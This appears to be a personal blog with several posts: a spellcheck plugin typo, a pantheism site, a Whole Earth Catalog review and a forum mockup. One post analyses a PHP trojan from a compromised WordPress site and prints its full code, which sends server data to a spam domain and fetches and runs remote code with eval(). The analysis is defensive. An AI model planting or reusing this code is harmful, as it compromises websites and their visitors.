Damn you, brain! Why can’t YOU run spellcheck?!

I just came back from a late night coffee run and decided to sit down to work a little on my discussion forum before going to bed (I need coffee to sleep… don’t ask).

It was all fine and dandy until I decided to add a little spellcheck option to the input form. Not expecting that many people will use it since this is also meant to be mobile friendly so a lot of posts will likewise be txtspeak gibberish, but I thought it would be nice to have the feature anyway.

Let me preface this by saying that I have never been good at spelling or even an OK at spelling for that matter. I was even rubbish at spelling in Sinhalese when I was a little kid so this isn’t just an English thing. I don’t know if it’s some undiagnosed form of dyslexia or maybe I’m typing faster than the throughput of my cerebral plumbing or visa versa; either way, I just can’t spell.

So when I started writing the spellcheck functionality, I thought it was a simple, straightfoward affair. A dictionary source, a backend response generator and some client-side jQuery witchcraft to make this work without any added burden to the UI.

The burden, it turns out, was to my prefrontal cortex.

E.G. This was meant to be just a simpler version of the spellecheck plugin which comes with TinyMCE. I’m wasn’t using an IDE for the JS side of this, so I figured I’d be fine with just notepad.

What’s wrong with this?

(function() {
	tinymce.create('tinymce.plugins.SpelchekcPlugin', {
		inti : function(ed, url) {
			// Some stuff will happen here
		},
		createControl : function(n, cm) {
			return null;
		},
		getInfo : function() {
			return {
				longname: 'Spellcheck Plugin',
				author : 'eksith'
			};
		}
	});
});

Sometimes, I feel like a construction worker who’s always safe with equipment, always wears a helmet, always on time and always forgets his pants.

Anatomy of a PHP trojan

A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident of another friend’s website. The backend was compromised with no apparent user involvement which means another site on the same server possibly served as the backdoor or perhaps the server admins didn’t set the permissions correctly.

A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the uploading privileges which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since they had sandboxed access.

Certain WordPress plugins require an inordinate amount of privileges, which is the one big reason to run a site with the minumum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or allow arbritary writing and uploading privileges when the bare minimum is acceptable.

The following is a file called 189715.php found on the /wp-uploads folder of this website and the same code was found in other areas with different number filenames. This was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted :

<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>

<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?" .
	base64_encode($a). "." .
	base64_encode($b) . "." .
	base64_encode($c) . "." .
	base64_encode($d) . "." .
	base64_encode($e) . "." .
	base64_encode($f) . "." .
	base64_encode($g) . "." .
	base64_encode($h) . ".e." .
	base64_encode($i) . "." .
	base64_encode($j);

$f=base64_decode("cGhwc2VhcmNoLmNu");

if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
	md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
	$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else{
		$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
};
die(); ?>

Variable $z was basically a querystring intended to send all of the relevant server and environment data gathered in the previously defined variables.

String “cGhwc2VhcmNoLmNu” assigned to the $f variable turned out to be “phpsearch.cn”, this particular spammer’s domain. String “aHR0cDovL2FkczMu” turned out to be subdomain “http://ads3.” meaning this was a domain intended to inject spam and I’m sure the domain itself was expendable. String “aHR0cDovLzcxLg==” was pointing to subdomain “http://71.” while “aHR0cDovLzcu” was subdomain “http://7.”.

That include block was meant to try and download another PHP file remotely which it would then try to execute locally with the “eval()” function.

If the remote include failed, it would try curl to get the file and execute the file instead.

The [BASE64 ENCODED STRING] was actually another encoded function :

if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
	$GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
	if(file_exists($GLOBALS['mfsn'])){
			include_once($GLOBALS['mfsn']);
			if(function_exists('gml') && function_exists('dgobh'))
			{ob_start('dgobh');}
		}
}

The [REDACTED ROOT] is of course where the WP installation directory on this server and in this case, the compromised plugin was OpenID.

The Auth/OpenID directory was full of junk that was surrepticiously uploaded as well. Also, the content of the style.css.php was another massive block of base64 encoded code (which I was unable to decode) and “mfsn” variable held the location of another file that was meant to be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but I can guess that it included everything from more injection code to spam to even drive-by downloads.

After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.

PHP Trojans would often employ base64 encoding and even splitting up the encoded string into multiple sections before decoding and running eval(). This would make it harder to spot and even harder to figure out what the code does exactly, especially in a big file, with just a cursory glance.

Site of the Week: Pantheism.net

I’ve been fascinated with the Pantheism movement for a very long time and this is probably the closest modern, spiritually prefaced, interpretation of the age long idea of not [pooping] where you eat. I.E. Live and let live, responsibly. Pantheism.net is a good resource for people just starting to learning the details.

Are you searching for a path which focuses on Earth in the Cosmos, rather than some imaginary beyond? Are you more concerned with saving the planet than saving your eternal soul?
Do you hunger for a spirituality that respects individual choice rather than pushing prejudice down people's throats, and that values reason rather than fanaticism?
Do you find it impossible to believe in supernatural beings, and difficult to conceive of anything more worthy of the deepest respect than the beauty of Nature or the power and mystery of the Universe?
Do you feel a deep sense of peace and belonging and wonder in the midst of Nature?
If you answered yes to these questions, then you will feel at home in the World Pantheist Movement.

Whole Earth Catalog: A roadmap to humanity

I found this volume at a tag sale some years ago and thought it was just a curiosity at the time. I bought it for a few dollars and took it home only to forget about it until recently (moving does that to you sometimes).

After getting another chance to go over everything I’ve been missing, I have to say… This is by far one of the best resources on simple living, sustainability and even our own peculiarities (I.E. there is no censorship). The Whole Earth Catalog should be in everyone’s library. If anything it can really open some eyes that are sewn shut with self-centeredness these days.

It’s one of the more revolutionary publications that will sorely be missed today.

Subtitling this "Access to Tools" has to be one of the biggest understatements in publishing. It's oh-so-much-more

 

The catalog is a year older than me! And it really does cover the Whole Earth!

Published October 1981

 

The map has changed a bit since this edition, but the topics it covers – vast in breadth and depth — goes from “Understanding Whole Systems” which include Laws of form, Space, Eco-ethics, Evolution, Natural history, Plants as well as “Community” which includes Recycling, Rural emergency, Home nursing Women’s health, Childbirth (in graphic detail), Sex (also in “detail” of sorts), Consumer reports and everything in-between. It’s a who’s who and what’s what of basic and enhanced living.

The list of topics covered is copious as it is astoundingly fascinating.

 

While browsing through this time, I came across an article on Sri Lanka! Specifically the concept of “Shramadana” which is a contraction of Sarvodaya Shamadana Movement in Sri Lanka. The article goes into a specific example at work, however considering this was published before the civil war, I don’t know how many of these people are still around. Hopefully many. Their example will be one of the few things that will keep the country going.

"It does not require oil, gas coal or nukes; it empowers people not machines; it is shramadana. Literally meaning the giving (dana) of human energy (shrama)"

 

The concept can best be summarized as using human equity toward completing projects for the community. Anyone can grab a tool and participate provided you’re of able body and sound mind. It doesn’t matter what your social status is; a banker and farmer are equals in terms of what they can contribute in human energy.

Habitat for Humanity is probably the closest Western counterpart

 

What really got me interested are the aspects of environmental consciousness that and examples of “better” and “wiser” living that we could really use right now. It really drives home how much this was ahead of its time as only now are we starting to understand the consequences of our actions.

"The Man Who Planted Trees and Grew Happiness" - Brilliant!

 

Then there are the creative aspects of what we can actually do about this. The sustainability pointers in this are, I think, invaluable today more than ever.

Building a house using telephone poles as raw material. How creative is that?

 

The book is full of examples like these for simple, sustainable living as well as creative solutions to real world problems that are oddly still applicable by and large today.

Then there are also aspects of humanity that some of us still wouldn’t dare discuss openly or honestly. It’s amazing testament to how much popular publications censor themselves on real issues while advancing pointless topics. Talk about being hypocritical prudes.

I had to cover the naughty bits. This being a family-friendly blog and all ;)

 

Did I mention there’s no censorship in this book? Can you imagine a popular publication making mention of something like this today?

And that, boys and girls, is why I keep thinking I was born a few decades too late.

Discussion Forum mockup

I love Sundays. Not just because there’s no post on Sundays as Vernon Dursley from Harry Potter would infer, but it’s because I get to sleep late some days.

This morning, I put together a quick HTML mockup of the original front page sketch of the discussion forum I talked about a few days ago. All in all, I’m pretty satisfied at how close it came to the Photoshop version and, aside from a few rough edges, I think it accomplishes pretty much everything I want in a “Home” page.

Now I just need to put together the “Tag” page where users can browse all posts under that tag (pretty similar to the “Author” page where users can see all posts under a particular user) and something like a very simple dashboard for the “My Account” page where users can keep track of their subscriptions.

I think it’s best to keep everything organized via feeds for this. If all subscriptions are done in RSS, I think it would be easier for mobile users as well.

I’ll make any changes to the HTML layout on the mockup and start the backend work soon.